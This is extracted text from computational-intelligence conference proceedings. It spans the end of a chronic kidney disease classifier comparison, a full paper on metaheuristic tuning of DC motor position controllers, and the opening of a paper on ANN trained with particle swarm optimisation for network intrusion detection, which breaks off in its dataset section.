Separation with clear margin gives good Huge sets of data is not apt for this algorithm
accuracy
When the total sample is less than the total Function of kernel needs to be good
dimensions the result is better
Efficiency in memory usage Estimation of probability is not given

6.5 KNN

One of the elementary machine learning algorithm with no parameters. In this type
of approach, the harmony between the new cases are checked and they are assigned
to a class as per the similarity. Though mostly it is employed for classification, KNN
can also be used to predict the outcome of regression problems. In KNN, the training
data is not absorbed straightaway and hence the term of lazy learner is given to this
technique. The drawbacks and benefits of this classification technique are stated in
Table 5.

Table 5 Pros and cons of KNN


Pros Cons
Uncomplicated and instinctive The algorithm is slow
No assumptions are made When the number of attributes increases the
accuracy decreases
In case of problems with multiclass Susceptible to outliers
implementation is very easy
Evolves regularly Missing data can’t be dealt with
Inferring the Occurrence of Chronic Kidney Failure … 743

6.6 Random Forest

In this type of machine learning approach, various classifiers are blended so that
a complicated problem can be solved and the model performance increases signif-
icantly. In random forest, the prediction of one decision tree is not considered, as
shown in Fig. 5, rather the performance of more than one decision tree is taken into
consideration and thereafter the final result is produced by averaging or with respect
to the majority prediction. Table 6 lists the pros and cons of random forest.

Fig. 5 Overview of random


forest

Table 6 Pros and cons of


Pros Cons
random forest
Excellent accuracy for predicting Possibility of overfitting
outcomes
Huge data is not a problem at all Complex
Normalization is not necessary Time required is more
Missing data can be taken care Variable importance is not
of efficiently analysed
744 R. Pramanik et al.

7 Examination of Performance

Confusion matrix is a catalogue that is very frequently used for the measurement of
potentiality of various machine learning classification methods. Error matrix is an
another name that is given to this table.
The different terminologies for the confusion matrix which has been shown in
Table 7 is explained below:
True Positive (TP): It is true and the prediction obtained is positive.
True Negative (TN): It is true and the prediction obtained is negative.
False Positive (FP): It is false and the prediction obtained is positive.
False Negative (FN): It is false and the prediction obtained is negative.

Table 7 Confusion matrix of


Label of class CKD present CKD not present
chronic kidney disorder
CKD present TP FN
CKD not present FP TN

The confusion matrix of all the classification techniques that has been employed
to predict the result is displayed in Fig. 6.

Fig. 6 Confusion matrix of 6 machine learning classification algorithm

Explanation of various performance metrics [25] that is computed in Table 8 are


as follows.
Inferring the Occurrence of Chronic Kidney Failure … 745

Sensitivity—TP/(TP + FN): Truly positive percentage.


Specificity—TN/(TN + FP): Truly negative percentage.
PPV (Positive Predicted Value)—Probabilistic measure of patients suffering from
CKD.
NPV (Negative Predicted Value)—Probabilistic measure of patients not suffering
from CKD [26].

Table 8 Measure of performance of contrasting classifier used


Classifier Sensitivity (%) Specificity (%) PPV (%) NPV (%)
Logistic regression 97.14 89.79 87.17 97.78
Decision tree 85.71 97.96 96.77 90.57
Naïve Bayes 100.00 93.88 92.11 100.00
SVM 94.29 91.84 89.19 95.74
KNN 82.86 69.39 65.91 85.00
Random forest 97.14 100.00 100.00 98.00

Accuracy of a classification model is determined by the calculating the right


prediction percentage in the data set of test [27]. The formula for classification can
be computed as: correct prediction/all predictions or in terms of confusion matrix it
is
TP + TN
Accuracy = (3)
TP + TN + FP + FN

The accuracy of the six classification methods and their comparison graph is
plotted in Fig. 7.

120
100
96.42 98.81
80 92.86 92.86 92.86
Accuracy

60 75
40
20
0
Classifier
LR Decision Tree Naïve Bayes SVM KNN Random Forest

Fig. 7 Comparison graph of different classifier used


746 R. Pramanik et al.

Table 9 lists the comparative analysis and performance measure of other papers
that are based on the experiment of predicting chronic kidney disease using various
data mining classification techniques.

Table 9 Comparative analysis


Authors Year Methodology Result
Jing Ciao et al 2019 LR, Elastic Net, Ridge, LR ranked first with AUC of
Lasso, RF, SVM, NN, 0.873 and 82% accuracy
XGBoost, k-NN
Ahmed J. Aljaaf et al 2018 SVM, MLP, LOGR, MLP and LOGR both got the
RPART highest accuracy of 98.1%
Anik Saha et al 2019 Random forest, multilayer The best accuracy of 96.75%
perceptron, Naïve Bayes, has been achieved by random
Adam-DNN, M logistic forest classifier
regression
Anusorn Charleonnan et al 2016 SVM, KNN, decision tree, Surpassing all the other
logistic regression classifiers SVM achieved the
highest accuracy of 98.3%
Parul Sinha et al 2015 SVM, KNN KNN got the better accuracy
of 78.75%

8 Conclusion and Future Work

Chronic kidney disease is a critical health condition leading to hundreds of death


each year and hence the determination of the presence of the disorder in a patient
is required and necessary so that the patients are spared from the risk and also
further complicated treatments and surgery. The dataset is filtered by removing all
the redundant features, total of six classification techniques has been employed in this
experiment such as SVM, KNN, logistic regression, random forest, decision tree and
Naïve Bayes and they have been compared with each other based on different metrics
of performance. The performance metrics used are specificity, sensitivity, negative
predicted value, positive predicted value and accuracy. From the entire paper, it
has been examined and analyzed that the detection of chronic kidney disorder is
most accurately predicted by the random forest classification model with 98.81%
percentage of correctness, thus making the diagnosis of the mentioned disease in its
elementary stage efficient and fruitful.
This research work can be employed in developing an app or website where on
entering the details of the patient such as sugar level, blood pressure level and the
other attributes required the model would predict whether the patient is suffering
from CKD or not, making the work of medical industries faster and effective. The
treatment that has to be done can be initiated quickly thus reducing the risk of the
victim.
Inferring the Occurrence of Chronic Kidney Failure … 747

References

1. Gourisaria, M. K., Das, S., Sharma, R., Rautaray, S. S., & Pandey, M. (2020). A deep learning
model for Malaria disease detection and analysis using deep convolutional neural networks.
International Journal of emerging Technologies, 11(2), 699–704.
2. Stages of CKD. https://www.healthline.com/health/ckd-stages. Last accessed 26 Jan 2021.
3. Chronic Kidney Disease (CKD). Prevalence and Management in India. https://www.med
india.net/health_statistics/diseases/chronic-kidney-disease-ckd-india.asp. Last accessed 26 Jan
2021.
4. Global Facts: About Kidney Disease. https://www.kidney.org/kidneydisease/global-facts-
about-kidney-disease. Last accessed 26 Jan 2021
5. Aljaaf, A. J., Al-Jumeily, D., Haglan, H. M., Alloghani, M., Baker, T., Hussain, A. J., & Musta-
fina, J. (2018). Early prediction of chronic kidney disease using machine learning supported
by predictive analytics. In IEEE congress on evolutionary computation (CEC) (pp. 1–9). IEEE
6. Almansour, N. A., Syed, H. F., Khayat, N. R., Altheeb, R. K., Juri, R. E., Alhiyafi, J., & Olatunji,
S. O. (2019). Neural network and support vector machine for the prediction of chronic kidney
disease: A comparative study. Computers in Biology and Medicine, 109, 101–111.
7. Xiao, J., Ding, R., Xu, X., Guan, H., Feng, X., Sun, T., & Ye, Z. (2019). Comparison and
development of machine learning tools in the prediction of chronic kidney disease progression.
Journal of Translational Medicine, 17(1), 1–13.
8. Charleonnan, A., Fufaung, T., Niyomwong, T., Chokchueypattanakit, W., Suwanna-wach, S., &
Ninchawee, N. (2016). Predictive analytics for chronic kidney disease using machine learning
techniques. In Management and Innovation Technology International Conference (MITicon)
(pp. 80–83), Bang-San
9. Saha, A., Saha, A., & Mittra, T. (2019). Performance measurements of machine learning
approaches for prediction and diagnosis of chronic kidney disease (CKD). In Proceedings
of the 2019 7th international conference on computer and communications management
(pp. 200–204).
10. Sinha, P., & Sinha, P. (2015). Comparative study of chronic kidney disease prediction using
KNN and SVM. International Journal of Engineering Research and Technology, 4(12), 608–
612.
11. Qin, J., Chen, L., Liu, Y., Liu, C., Feng, C., & Chen, B. (2019). A machine learning methodology
for diagnosing chronic kidney disease. IEEE Access, 8, 20991–21002.
12. Almasoud, M., & Ward, T. E. (2019). Detection of chronic kidney disease using machine
learning algorithms with least number of predictors. International Journal of Soft Computing
and Its Applications, 10(8).
13. Rubini, L. J., & Eswaran, P. (2015). Generating comparative analysis of early stage prediction
of Chronic Kidney Disease. International Journal of Modern Engineering Research (IJMER),
5(7), 49–55.
14. Devika, R., Avilala, S. V., & Subramaniyaswamy, V. Comparative study of classifier for chronic
kidney disease prediction using naive Bayes, KNN and random forest. In 2019 3rd International
conference on computing methodologies and communication (ICCMC) (pp. 679–684). IEEE.
15. Das, S., Sharma, R., Gourisaria, M. K., Rautaray, S. S., & Pandey, M. (2020). Heart disease
detection using core machine learning and deep learning techniques: A comparative study.
International Journal on Emerging Technologies., 11(3), 531–538.
16. Categorical Variable. https://en.wikipedia.org/wiki/Categorical_variable. Last accessed 25 Jan
2021.
17. Anand, A., Anand, H., Rautaray, S. S., Pandey, M., & Gourisaria, M. K. (2020). Analysis and
prediction of chronic heart diseases using machine learning classification models. International
Journal of Advanced Trends in Computer Science and Engineering, 9(5), 8479–8487, 227.
18. Machine Learning Standardization. https://towardsai.net/p/machine-learning/machine-lea
rning-standardization-z-score-normalization-with-mathematics. Last accessed 27 Jan 2021.
748 R. Pramanik et al.

19. Mishra, S., Pandey, M., Rautaray, S. S., & Gourisaria, M. K. (2020). A survey on big data analyt-
ical tools and techniques in health care sector. International Journal on Emerging Technologies.,
11(3), 554–560.
20. Feature Selection For Machine Learning in Python. https://towardsdatascience.com/feature-
selection-for-machine-learning-in-python-filter-methods-6071c5d267d5. Last accessed 26 Jan
2021.
21. Decision Trees in Machine Learning. https://towardsdatascience.com/decision-trees-in-mac
hine-learning-641b9c4e8052. Last accessed 20 Jan 2021.
22. Sharma, R., Gourisaria, M. K., Rautray, S. S., Pandey, M., & Patra, S. S. (2020). ECG classi-
fication using deep convolutional neural networks and data analysis. International Journal of
Advanced Trends in Computer Science and Engineering, 9(4), 5788–5795.
23. Logistic Regression for Machine Learning. https://machinelearningmastery.com/logistic-reg
ression-for-machine-learning/. Last accessed 20 Jan 2021.
24. SVM- Introduction to Machine Learning. https://towardsdatascience.com/support-vector-mac
hine-introduction-to-machine-learning-algorithms-934a444fca47. Last accessed 21 Jan 2021.
25. Evaluating Categorical Models. https://towardsdatascience.com/evaluating-categorical-mod
els-ii-sensitivity-and-specificity-e181e573cff8. Last accessed 24 Jan 2021.
26. Positive and Negative Predictive Values. https://en.wikipedia.org/wiki/Positive_and_negative_
predictive_values. Last accessed 24 Jan 2021.
27. Machine Learning-Performance Metrics. https://www.tutorialspoint.com/machine_lear
ning_with_python/machine_learning_algorithms_performance_metrics.htm. Last accessed
24 Jan 2021.
Comparative Analysis for Optimal
Tuning of DC Motor Position Control
System

Avi Singhal, Dhruv Mittal, Ritwik Roy, and Pankaj Dahiya

Abstract DC motors are an important component and are used in industrial


machines and engineering applications. The position control of DC motor is useful
in precision control systems. This study aims to present a comparative analysis of
different controllers and to tune these controllers using metaheuristic algorithms for
DC motor position control. The position control is modeled using its transfer func-
tion. In this study, the performance of PID, fractional-PID (F-PID) and PID with
filter coefficient Ni (PID-N) has been compared. The controller’s parameters, i.e.,
K p , K i , K d , N i , μ, λ have been tuned by using global neighborhood algorithm (GNA)
and bat algorithm (BA). The optimization performance of the chosen algorithms is
compared using transient response analysis. The results obtained after performing the
simulation show that the overall performance of PID-N controller is better compared
to the other controllers, and GNA does better overall tuning of controller parameters
compared to BA. All simulations were done using MATLAB/Simulink.

Keywords DC motor · Global neighborhood algorithm · Bat algorithm · PID ·


F-PID · PID-N

1 Introduction

The DC motor, which refers to the direct current motor, is a common component in
many electronic devices. It works according to Lorentz law; the DC motor assembly
has a permanent magnet in which the conductive coil called armature is placed. At
the center, there is a shaft which facilitates rotation. The armature is connected to
commutator rings, which helps to keep contact with the supply at all times, and the
brushes connect the supply to the commutator rings. Another type of motor called the

A. Singhal (B) · D. Mittal · R. Roy · P. Dahiya


Department of Electronics and Communication Engineering, Delhi Technological University,
New Delhi, India
P. Dahiya
e-mail: pankajdahiya@dtu.ac.in

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 749
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_60
750 A. Singhal et al.

induction motor works according to electromagnetic induction principle. This motor


is also called alternating current (AC) motor. The maintenance cost of an induction
motor is less compared to that of DC motor, the lifetime of AC motor is also greater
than DC motor, but still, DC motor is widely used. Some of the applications of DC
motor are as follows: toys, two-wheel electric vehicles, fans. The DC motor has good
speed control characteristics, and many people have worked on it.
To achieve stable response output, we use a controller. The controller uses its
parameters as the control inputs. These control variables are tuned according to
requirement to get desired output. Using a feedback loop, the output is taken and
then subtracted from input to get the error which is then fed to controller, which
when used with tuned control parameters, gives an output which is stable.
When using a controller, it is necessary to tune the control parameters for getting
stable output. This is a tedious process if done manually as the solution space is
very large, and as the number of variables increase„ it is difficult to get the best set
of control parameters. So, to resolve this, metaheuristic algorithms can be used. In
these algorithms, by the use of an objective function, which is designed according to
requirements, the solution space is searched to find the right set of control parameters.
Main purpose of these algorithms is to generate solutions, calculate its objective
function value and minimize it.
In order to achieve DC motor position control, PID controllers have been used
previously, and many methods were implemented by researchers for finding the
controller parameters. Metaheuristic algorithms have also been proposed for the
controller tuning, and Neenu Thomas proposed position control using Ziegler-
Nichols and genetic algorithm optimized PID controller [1]. Amir replaced the PID
controller by artificial neural network controller [2] for DC motor position control.
Fuzzy logic-based self-tuning PID controller [3, 4] was implemented by Flores.
Gravitational search algorithm [5] has been used for PID tuning of DC motor posi-
tion control by Serhat Duman. PID controller was proposed for optimization for
induction motor [6] by Youssef. A significant amount of work has been done on
DC motor speed control. The PID controller tuning for speed control using various
techniques has been presented in [7] by Manoj, and particle swarm algorithm [8] was
implemented by B. Allaoua. Ziegler-Nichols tuning for speed control was done by P.
M. Meshram [9]. Gray wolf optimization was used for PID controller tuning for DC
motor speed control by K. R. Das [10]. Fractional order PID [11, 12] controller has
also been used for speed control. Bat algorithm has been implemented for optimiza-
tion of speed control for brushless DC motor [13]. GNA was previously applied to
tune and optimize parameters of a PID controller for an automatic voltage regulator
system by H. Gozde [14]. However, the global neighborhood algorithm (GNA) and
bat algorithm (BA) have not yet been implemented for DC motor position control.
In this study, the effectiveness in tuning controllers for DC motor position control is
explored using these two algorithms.
This paper compares PID, F-PID and PID-N controllers as they have been tuned
using GNA and BA. The paper is presented as follows. A brief explanation of the DC
motor position control is provided in Sect. 2 and its corresponding transfer function.
Section 3 explains the working of the controllers. Section 4 explains the algorithms
Comparative Analysis for Optimal Tuning of DC Motor … 751

used, and Sect. 5 shows the objective function that is being optimized, followed by
simulation and results in Sect. 6. The conclusion is presented in Sect. 7.

2 DC Motor Position Control System

The DC motor converts electrical energy to mechanical energy. Position control is


required in precision control systems, where the position has to be rotated according
to a given input signal. The self-excited DC motor with field coil connected in parallel
with the armature is a suitable configuration for position control, and the speed control
is almost constant with torque for this configuration. In the shunt configuration, the
resistance of the field coil should be large so that most of the current flows through
the armature, and so that the value of torque will be high.
The transfer function [1] used is shown in Eq. (1),

(s) 1.2
= (1)
v(s) 0.00077 s3 + 0.0539 s2 + 1.441 s

where  = angular displacement in radians, v = armature voltage in volts.

3 Controller

3.1 PID

The three parameters of a PID controller are K p , K i and K d . The constant K p produces
an output to correct the error which is proportional to it. The constant K i helps to
diminish the error by integrating it over time until it reaches 0 value. The derivative
constant K d tries to reduce error as it predicts future behavior of error as it uses rate
of change of error. The general equation for PID controller is as Eq. (2)

t
de(t)
G PID = K p e(t) + K i e(t)dt + K d (2)
d(t)
0
752 A. Singhal et al.

Fig. 1 Block diagram of


PID-N controller

3.2 PID-N

The derivative block used in PID controller introduces noise. To avoid this
phenomenon, it is possible to use a filtered derivative loop which has filter coef-
ficient N i . The feedback loop has 1/s in feedback path and N i in the forward path.
The diagram of PID-N is shown in Fig. 1.
PID-N controller produces output according to Eq. (3)

Ki Ni
G PID−N = K p + + Kd (3)
s 1 + Nsi

3.3 F-PID

F-PID controller is represented as PIλ Dμ , where there is an integrator and a differ-


entiator of order λ and μ, respectively. One of the advantages of fractional order
controller, as opposed to conventional PID, is that it can provide more adjustable
frequency and time responses in control system which helps get more robust perfor-
mance. One of the primary reasons for using fractional order controller is that it
can better control a system that allows to achieve stability more efficiently. Another
advantage is that it is less sensitive to changes in the parameters so it can provide
better results. F-PID controller produces output according to Eq. (4).

Ki
G = Kp + + K d s μ (μ, λ > 0) (4)

Comparative Analysis for Optimal Tuning of DC Motor … 753

4 Algorithms

4.1 Global Neighborhood Algorithm (GNA)

Global neighborhood algorithm was proposed by Alazzam in 2013 [15]. In this, the
initial population is randomly generated, and its fitness is calculated. Then, ordering
of population according to fitness is done, and best solution is assigned the global
best solution. Then, new population is created, in which first 50% population is
created about the neighborhood of global best solution, and the rest 50% is randomly
generated. Again, calculation of fitness and ordering according to fitness is done. If
the current best solution is better than global best solution, then current best solution
becomes the global best solution, and this procedure continues until the iteration
ends.

4.2 Bat Algorithm (BA)

It was developed by XS Yang [16]. Bats use echolocation to find their prey while
flying at the velocity vi and position pi . They use waves of frequency f and at a rate
ci and loudness L i . Initially, in the algorithm, population is generated with random
velocity and position. Then, their fitness value is evaluated. Next, the velocity and
position of population are updated according to Eqs. (5)–(7), where β takes a random
number between 0 and 1, and the best solution is denoted by p∗ . Next, a random
number is generated, and if it is greater than ci , a solution among the best solution
is selected, and a new solution is created according to Eq. (8), where the average
loudness of the bats is represented by L t , else generate a random solution. Again,
evaluate the fitness function, and a random number is generated. If new solution has
a better fitness than the fitness of the best solution with the generated random number
being less than the loudness for that bat, in that case, this solution is incorporated, and
pulse rate and loudness are updated according to Eq. (9), and this solution becomes
the best solution. Then repeat the process till the iteration count expires.
 
f i = f low + f high − f low β (5)

 
vit = vit−1 + pit − p∗ f i (6)

pit = pit−1 + vit (7)

pnew = pold + εL t , ε ∈ (−1, 1) (8)

 
L it+1 = αL it , cit+1 = ci0 1 − exp(−γ t) (9)
754 A. Singhal et al.

5 Objective Function Optimization

In this paper, the controller parameters have been determined and tuned using GNA
and BA. The objective function used in this work to get the optimal values of
these parameters is the integral time absolute error (ITAE), this is the function to
be minimized. The expression for ITAE is shown in Eq. (10)

tss
ITAE = ∫ t|e(t)|dt (10)
0

6 Simulation and Results

For BA and GNA, the population and iteration conditions were as follows:
Maximum population: 40, Maximum iteration: 20
BA parameters:
Maximum frequency: 1, Minimum frequency: 0, α: 0.5, γ : 0.5
The value of the controller parameters is as shown in Table 1.
The value of the transient response parameters for all the controllers tuned using
GNA and BA is shown in Table 2.
The transient response using GNA for controllers has been plotted in Fig. 2.

Table 1 Controller parameters


Algorithm Kp Ki Kd Ni μ λ
GNA PID 19.0882 0.0002 0.2196 – – –
GNA F-PID 18.515 0.0940 0.3619 – 0.8938 0.0145
GNA PID-N 19.9893 0 0.3318 239.799 – –
BAT PID 19.3879 0 0.1541 – – –
BAT F-PID 19.5178 0.6827 0.4535 – 0.8403 0.0083
BAT PID-N 19.4547 0 0.2926 226.322 – –

Table 2 Transient
Algorithm Rise time (s) Settling time (s) Overshoot (%)
parameters of DC motor
position control GNA PID 0.0889 0.1961 2.1233
GNA F-PID 0.0821 0.1283 1.5558
GNA PID-N 0.0782 0.1262 0.1045
BAT PID 0.0829 0.2265 4.9593
BAT F-PID 0.0729 0.1815 4.2854
BAT PID-N 0.0802 0.1284 0.5336
Comparative Analysis for Optimal Tuning of DC Motor … 755

1
Angular Displacement (radians)

0.5

Step Input
Step Response of PID
Step Response of F-PID
Step Response of PID-N
0

0 0.1 0.2 0.3 0.4 0.5 0.6 0.7 0.8 0.9 1


Time(seconds)

Fig. 2 GNA response for DC motor position control

1
Angular Displacement (radians)

0.5

Step Input
Step Response of PID
Step Response of F-PID
Step Response of PID-N
0

0 0.1 0.2 0.3 0.4 0.5 0.6 0.7 0.8 0.9 1


Time(seconds)

Fig. 3 BA response for DC motor position control

The transient response using BA for controllers has been plotted in Fig. 3.

7 Conclusion

In this paper, a comparative study of the transient response for PID, F-PID and PID-N
controllers was performed. The controller parameters were obtained and tuned using
GNA and BA. The response was plotted, and parameters like rise time, overshoot
(%) and settling time were obtained, and a comparison was done. It was found that F-
PID gave better performance over PID. Even though BA tuned F-PID gave slightly
756 A. Singhal et al.

better rise time compared to PID-N results for both BA and GNA, the overshoot
and settling time were very high. Hence, the PID-N controller gives the best overall
performance among the three. It was found that tuning of controllers using GNA
gave better overall performance compared to BA.

References

1. Neenu Thomas, D. P. P. (2009). Position control of DC motor using genetic algorithm based
PID controller. Proc World Congr Eng 2009
2. Aamir, M. (2013). On replacing PID controller with ANN controller for DC motor position
control. Int J Res Stud Comput, 2, 21–29. https://doi.org/10.5861/ijrsc.2013.236
3. Moran, M. E. F., & Viera, N. A. P. (2018). Comparative study for DC motor position controllers.
In 2017 IEEE 2nd Ecuador Tech Chapters Meet ETCM 2017 2017-Janua:1–6. https://doi.org/
10.1109/ETCM.2017.8247475
4. Flores-Morán, E., Yánez-Pazmiño, W., & Barzola-Monteses, J. (2018). Genetic algorithm and
fuzzy self-tuning PID for DC motor position controllers. Proc 2018 19th Int Carpathian Control
Conf ICCC 2018, 162–168. https://doi.org/10.1109/CarpathianCC.2018.8399621
5. Duman, S., Maden, D., & Güvenç, U. (2011). Determination of the PID controller parameters
for speed and position control of DC motor using gravitational search algorithm. In ELECO
2011—7th Int Conf Electr Electron Eng.
6. Dhieb, Y., Yaich, M., Guermazi, A., & Ghariani, M. (2019). PID controller tuning using ant
colony optimization for induction motor. J Electr Syst, 15, 133–141.
7. Manoj Kushwah PAP (2014) Tuning of PID controller for speed control of DC motor using
soft computing techniques—A review. Adv Electron Electr Eng, 4.
8. Allaoua, B., & Mebarki, B. (2012). Intelligent PID DC motor speed control alteration param-
eters using particle swarm optimization. Artif Intell Resour Control Autom Eng, 3–14. https://
doi.org/10.2174/978160805126711201010003
9. Meshram Rohit, P. M., & Kanojiya G. (2012). Method for speed control of DC Motor. Int Conf
Adv Eng Sci Manag, 117–122.
10. Das, K. R., Das, D., & Das, J. (2016). Optimal tuning of PID controller using GWO algorithm
for speed control in DC motor. Int Conf Soft Comput Tech Implementations, ICSCTI, 2015,
108–112. https://doi.org/10.1109/ICSCTI.2015.7489575
11. Jain, R. V. , & MVA, ASJ. (2016). Tuning of fractional order PID controller using particle
swarm optimization technique for DC motor speed control, 006, 6–9
12. Hekimoglu, B. (2019). Optimal Tuning of Fractional Order PID Controller for DC Motor Speed
Control via Chaotic Atom Search Optimization Algorithm. IEEE Access, 7, 38100–38114.
https://doi.org/10.1109/ACCESS.2019.2905961
13. Premkumar, K., & Manikandan, B. V. (2016). Bat algorithm optimized fuzzy PD based speed
controller for brushless direct current motor. Eng Sci Technol an Int J, 19, 818–840. https://
doi.org/10.1016/j.jestch.2015.11.004
14. Gozde, H., Taplamacioglu, M. C., & Ari, M. (2017). Simulation study for global neighborhood
algorithm based optimal automatic voltage regulator (AVR) system. In ICSG 2017—5th Int
Istanbul Smart Grids Cities Congr Fair (pp. 46–50). https://doi.org/10.1109/SGCF.2017.794
7634
15. Alazzam A. W. H. (2013). A new optimization algorithm for combinatorial problems. Int J
Adv Res Artif Intell, 2, 63–68. https://doi.org/10.14569/ijarai.2013.020510
16. Yang, X. S. (2010). A new metaheuristic Bat-inspired Algorithm. Stud Comput Intell, 284,
65–74. https://doi.org/10.1007/978-3-642-12538-6_6
A Hybrid Approach of ANN-PSO
Technique for Anomaly Detection

Sonika Dahiya, Priyansh Soni, Hridya Shiju Nadappattel,


and Mohammad Fraz

Abstract As of late, AI-based anomaly detection has found a new interest, as the
number and complexity of new breaches keep on improvising, subsequently, newer
approaches to evolve and best deal with the attacks are fundamental. We propose the
artificial neural networks to devise a novel cyber intrusion detection method. While
the ANNs are popularly trained by the back propagation and genetic algorithm, we
propose the particle swarm optimisation method to help resolve issues like slow
convergence rate and easily getting trapped in local minima which arise with back
Propagation and genetic algorithm. The proposed approach utilises the standard NSL-
KDD data-set used in the field of anomaly detection method. The test results show
that our strategy performs better than a portion of the current procedures including
ANN-BP, ANN- GA, etc. and give accuracy in the range of 97–99%.

Keywords Artificial neural network · Particle swarm optimisation · Anomaly


detection · NSL-KDD

1 Introduction

The recent years have seen a growing use of the internet, and with this, an increasing
number of intrusion attacks. In 2020, with the onset of the COVID-19 pandemic and
the sudden and urgent need to digitise and move to online methods of communi-
cation, the development of a model to battle these attacks is necessary. To combat
the attacks, multiple intrusion detection systems (IDSs) have been developed [1–3]
which monitor networks and record any malicious activities that are observed with
a security information system and an event managing system. Intrusion detection
systems are mainly categorised as [4].

S. Dahiya · P. Soni (B) · H. S. Nadappattel · M. Fraz


Delhi Technological University, Delhi, India

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 757
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_61
758 S. Dahiya et al.

• network intrusion detection systems (NIDSs) are responsible for detecting those
malicious activities present in the network delivering incoming traffic.
• host-based intrusion detection systems (HIDSs) [5] are concerned with monitoring
the activities related to the files present on the operating system.

An IDS monitors the given traffic at a time and compares it to the attack informa-
tion already available, making it vital for high-security systems. On the detection of
certain anomalies, the IDS transmits an alert signal to the administrator. These are
some examples of anomalies:

• Forced break-ins, portrayed by the unusually high rate of password failure.


• Masquerading, successful break-ins with varied connections and location.
• Attacks by legitimate users, by routing data to devices not usually used, repeated
protocol violations, execution of unusual programmes, etc. [6].
• Viruses Attacks, categorised by their huge memory-requirements, disc space,
CPU-time, I/O activities, and a spike in the frequency of executable files rewritten
in the infected system.

It is essential to note that the development of a completely secure system is not


possible. There have been multiple works to improve IDS using supervised learning
methods, which make use of the labelled classes in the data-sets to classify attacks.
These have proven to be promising [7, 8]. Cryptography methods have also proven
to be highly effective due to their enormous parallelism [9, 10].
In this paper, the study proposes a supervised learning based model by integrating
artificial neural networks and particle swarm optimisation. The goal is to efficiently
find and classify anomalies, and thus, a much more precise detection model can be
obtained which increases the detection rate of an anomaly for the attacks that are
unknown to the IDS.
This study uses NSL-KDD data-set for training the proposed model. This research
work helps study how ANN, when trained with the PSO algorithm, can potentially
help to predict whether the given data corresponds to an anomaly.
Section 2 begins with the Related Work done in the past couple of years, specif-
ically in the field of intrusion detection with supervised learning. Section 3 talks
about the proposed Methodology and how the PSO has been used to train the ANN.
The fourth section describes the NSL-KDD [11] dataset and its pre-processing. This
section also briefs performance metrics. The fifth section describes the results in
detail and also discusses the impact of the various parameters of the algorithm on
the results.

2 Related Work

In a study by Kaliappan Jeyakumar, Thiagarajan Revathi, and Sundararajan Karpagam


et al. [12], the multi-layer Perceptron, is used on the KDD Cup 99 Dataset [13], a
well-known standard dataset for anomaly detection systems [14].
A Hybrid Approach of ANN-PSO Technique … 759

The KDD Cup 99 Dataset which is based on the DARPA’98 which hasn’t been
widely appreciated as shown by McHugh [15]. The simulated attack types fall under
the categories: Denial of Service Attacks (DoS), User to Root Attacks (U2R), Remote
to Local Attacks (R2L), and Probing Attacks (Probe).
A three-layer MLP was set up for this research process. One of the metrics used,
accuracy, ranged from 87.2% for normal dataset and the highest accuracy achieved
was 99.84% for U2R. Although the result achieved for U2R is high, the range of the
accuracies for the other datasets vary greatly, going from 92.31% for R2L, 94.2%
for Probe and 96.69% for DoS and needs an approach to standardise them into the
same range for better reliability.
In the studies performed by Taher, Yasin Jisan, Rahman, 2019 [16], various
machine learning algorithms were compared against each other with a focus on com-
paring the two specific supervised methods—Artificial Neural Network and Support
Vector Machine.
In this study, artificial neural network was trained with Backpropagation, which
improves the output by taking into account error on each pass. SVM, specifies a
hyperplane that defines the characteristics of classifiers and can be used for classifi-
cation, and is also helpful in the detection of outliers.
The two algorithms were compared using criteria of accuracy. The dataset used
to work on the intrusion detection problem was the NSL-KDD [17] dataset. It is
observed that ANN detects anomalies at a higher percentage of accuracy than SVM
and also has a higher stance in comparison with pre-existing models.
In another study conducted by Latah, Majd, Tokerd, 2018 [18], various super-
vised learning techniques, namely, Naive Bayes (NB), decision trees (DT), random
forest (RT), extreme learning machine (ELM), support vector machines (SVMs),
K nearest-neighbor (KNN), neural networks (NNs), linear discriminant analysis
(LDA), AdaBoost, RUSBoost, BaggingTrees, and LogitBoost were implemented
and compared against each other. The principal component analysis (PCA) method
was utilised for feature selection.
Through the study, it was observed that decision tree-based approach showed
optimum performance in terms of the accuracy, whereas the bagging and boost-
ing performed better than K-nearest neighbors (KNNs), extreme learning machine
(ELM), artificial neural networks (ANNs), support vector machines (SVM), linear
discriminant analysis (LDA), and random forest (RT).
Through these results, it can be gathered that many improvements have been
made available and many more can be made in using supervised measures to detect
anomalies with a good enough accuracy.

3 Proposed Method

Particle Swarm Optimisation Particle swarm optimisation is a robust optimisation


and evolutionary technique; a swarm of n particles communicate with one another
using search optimised directions and determine a global optimum. In each iteration
760 S. Dahiya et al.

of the algorithm, the location and position of each particle are updated as per its
previous knowledge, its experience, and the experience of its neighbours.
A particle is composed of 3 vectors: current location and/or position of the particle
(x-vector), the position of the best solution (p-best), a gradient for which particle will
travel if not updated (v-vector). All the particles are moved towards the best location
found by an individual so far (personal best) and the global best position (global
best) obtained so far by all particles which is done by adding the velocity-vector to
the position-vector to get another position-vector.

new Xi = Xi + V i (1)

When the particle calculated the new Xi, then it calculated its new position. If
new-fitness is better than p_best-fitness, then-

pbest = new Xi and p_best− f itness = new Xi− f itness. (2)

Using the PSO Algorithm to Train ANN This study uses PSO as a method to
train [19] and also work on optimising the network’s weights and biases. This is
done by creating a swarm with dimension equals the number of weights and biases
which is achieved by using an n-dimensional array and retrieval of the weights and
biases is done while feeding back to the network. Each of these particles represents an
individual neural network. To compute the error between the predictions and ground-
truth values, the Negative Log-likelihood is used. Figure 1 describes the ANN-PSO
algorithm.

4 Result and Analysis

The entire codebase of the algorithm was written in the Python; Google Colab was
used with the hardware specification as GPU: 1xTesla K80, compute 3.7, having
2496 CUDA cores, CPU: 1xsingle core hyper threaded Xeon Processors @2.3Ghz
i.e.(1 core, 2 threads), and RAM: 12.6 GB Available.

4.1 Dataset

There are many datasets available for intrusion detection systems, some examples
being - DARPA98, KDDCup99, CAIDA, NSL-KDD, ISCX 2012, ADFA-LD and
ADFA-WD and CICIDS 2017 [20]. Among these datasets, NSL-KDD dataset [17]
has been relied upon by many research works to be consistent and duly representing
real-time network traffic [14]. Hence, this is the dataset used in this research work.
It is derived from KDDCup [11] to eliminate the issues in the original KDDCup
dataset which lead to faulty performance of anomaly detection methods. The main
